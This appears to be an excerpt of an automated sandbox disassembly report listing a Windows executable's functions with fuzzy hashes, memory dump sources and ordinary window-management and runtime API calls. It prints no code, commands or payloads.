                                                            • Opcode Fuzzy Hash: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                            • Instruction Fuzzy Hash: D4C13676A183818FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E945CB96
                                                            Function 00CDF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CDF3A5), ref: 00CDF9DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                            • Instruction ID: 8028973fb022e60138ddea80e6a117f7bfa10d7d337e0f4e64088a8a45399b0c
                                                            • Opcode Fuzzy Hash: f74d8a8997d7c039c2c5cfb488a856382638142848cde2dd5f72325cdd2842b7
                                                            • Instruction Fuzzy Hash:
                                                            Function 00CEC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                            • Instruction ID: 78d51fb1f0f409f87f5c6f2f30d8997644efc37af6cb556811808d24b56f4975
                                                            • Opcode Fuzzy Hash: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                            • Instruction Fuzzy Hash: F1A02230203300FFC300CF30AF0CB2C3BE8AA283E2308802AB008C0230EB3080A0EB02
                                                            Function 00CD62CA Relevance: .8, Instructions: 829COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction ID: 4800f88b1e86e75450f3dcfaaf6479dd8a6896d350295f639f1d86295592b76c
                                                            • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                            • Instruction Fuzzy Hash: 8062D8716047849FCB25CF38C8906B9BBE1AF95304F08896FD9EA8B346D734EA45DB11
                                                            Function 00CD77EF Relevance: .8, Instructions: 817COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction ID: fef54d40e2703033dbe253ce4a96c79322c9da7c8e16fbe0704a9a3936c1a69f
                                                            • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                            • Instruction Fuzzy Hash: FE62E97160C3458FCB15CF28C8909B9BBE1BFD5304F18866EE99A8B346E730E945DB15
                                                            Function 00CCF461 Relevance: .7, Instructions: 694COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction ID: 1d44ef139e8366c4eb9a77c592fcb3a50a9ddd27c72590be74b13c9e2213ba5a
                                                            • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                            • Instruction Fuzzy Hash: 9F524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                            Function 00CD7153 Relevance: .5, Instructions: 536COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                            • Instruction ID: c93040e91ec02349d0b661d2ba54cdc458eb74571675bb9554b60f212df0dc7c
                                                            • Opcode Fuzzy Hash: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                            • Instruction Fuzzy Hash: 3412D3B16087069FC719CF28C490AB9B7E0FF94304F148A2EEA96C7780E334E995DB45
                                                            Function 00CCC426 Relevance: .5, Instructions: 454COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                            • Instruction ID: 3028f0a382ec455514df48a3bede132fc412d5613b4bfbd030c3bf78e78dd9bd
                                                            • Opcode Fuzzy Hash: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                            • Instruction Fuzzy Hash: 01F19A71A083418FC718CF29C5D4A2EBBE5EFDA354F144A2EF49AD7252D630EA45CB42
                                                            Function 00CD6CDC Relevance: .3, Instructions: 343COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 4ea7be89afbb94d878430ae473ac2f75459c75ed4f599bdf1a55a6c2b038028e
                                                            • Instruction ID: 8e38d2af33534c81c1ed77906e0c655307167e88fbd08b26ed188992bed0657c
                                                            • Opcode Fuzzy Hash: 4ea7be89afbb94d878430ae473ac2f75459c75ed4f599bdf1a55a6c2b038028e
                                                            • Instruction Fuzzy Hash: 8CD1F8B16083408FDB14CF28C98475BBBE1BF89308F08456EFA999B342D774EA05CB56
                                                            Function 00CCE9B7 Relevance: .3, Instructions: 320COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7f57f11d5f313b0befa4210889344c6598b7e04a1cc343691f1f39d26a216d7
                                                            • Instruction ID: ec66eb155e3c13712036ee14e0958eab93a223787c2a62ba54d81ffba5ee5f88
                                                            • Opcode Fuzzy Hash: e7f57f11d5f313b0befa4210889344c6598b7e04a1cc343691f1f39d26a216d7
                                                            • Instruction Fuzzy Hash: 2DE128755083948FC304CF29D89096ABFF0AF9A310F45495EF9D897392C235EA19DFA2
                                                            Function 00CD4088 Relevance: .3, Instructions: 270COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction ID: ae8b1a342f7841b3e35451c7bde938ed2b53b82941bd6f8fc60a1bdaa7945338
                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction Fuzzy Hash: 789145B02003499BDB2CEF68D899BBE77D5EB60304F10092EE796873C2DB749646D352
                                                            Function 00CD43BF Relevance: .2, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: 59add1a23be4f4217d4a2af988b56b097ea5d4b4075c0942baf6a74c3e6c820a
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: 49813B713043469BDB2CDE68D8D5BBD77D4AB91308F00092FFB968B382DA70C9869756
                                                            Function 00CE51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b21e7eb4111701e9fcefaa24d712da6b921c9900bd38efe16df512b79af1ef13
                                                            • Instruction ID: 5165a2e02f586c00ce4fff492c5b405c532668a075dd162694359eaf3e13a50b
                                                            • Opcode Fuzzy Hash: b21e7eb4111701e9fcefaa24d712da6b921c9900bd38efe16df512b79af1ef13
                                                            • Instruction Fuzzy Hash: 4561CE75A00FC957CE389A6B58927BE2394EF0134CF14051AE763DF2D2D691DF429315
                                                            Function 00CE4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction ID: 720fbb2404c505c779ef9bcbd4913ef5a22e2bcc6c05a53a434c4f4322c7446c
                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction Fuzzy Hash: DE514771600FC857DF3889AB8556FBF63C59B0270CF180919F8A3DB282C615EF4593A2
                                                            Function 00CCEFE2 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9e8f863423ef4e4540aa3dd23da30d753adef11de3c81f3744518a01fde8c4a
                                                            • Instruction ID: cbd4fcb8d72f10f3037188f29dcffc4ef13c216df833b8a843ac56a5aa4b8320
                                                            • Opcode Fuzzy Hash: c9e8f863423ef4e4540aa3dd23da30d753adef11de3c81f3744518a01fde8c4a
                                                            • Instruction Fuzzy Hash: B651D3715083D58FD712CF24C18096EBFE2AE9A714F4909ADE4E95B243C231DB4BDB62
                                                            Function 00CD00B7 Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                            • Instruction ID: 94482213c493999be2c0142c345e7507de57e993577bd0e967719f7bd64c6981
                                                            • Opcode Fuzzy Hash: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                            • Instruction Fuzzy Hash: DF51E2B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB9A
                                                            Function 00CD3E0B Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: 06d3a27e9a71f61af07d947a22166c4eb594c98390c8c90c9b059b12e6351926
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: D1312AB1A1474A8FCB18DF28C85126EBBE0FB95304F50452EE5D5C7781C734EA0ACB92
                                                            Function 00CCE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CCE30E
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                              • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D01030,00000200,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                            • _strlen.LIBCMT ref: 00CCE32F
                                                            • SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                            • GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                            • GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CCE475
                                                            • GetWindowRect.USER32(?,?), ref: 00CCE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 00CCE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 00CCE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 00CCE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 00CCE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 00CCE58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: 79d61e2fbd90e369e42c87b0057d10969ef3e38a4fc89ab8950f3f8c98b2a339
                                                            • Instruction ID: 9f7dab9751ea383abf3d05121b62f6a968034305acb4cc82fa74c4e29333c29e
                                                            • Opcode Fuzzy Hash: 79d61e2fbd90e369e42c87b0057d10969ef3e38a4fc89ab8950f3f8c98b2a339
                                                            • Instruction Fuzzy Hash: 54819272208341AFD711DFA8CD89F6FBBE9EB89704F04092DFA95D7250D634E9058B62
                                                            Function 00CECB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00CECB66
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC71E
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC730
                                                              • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC742
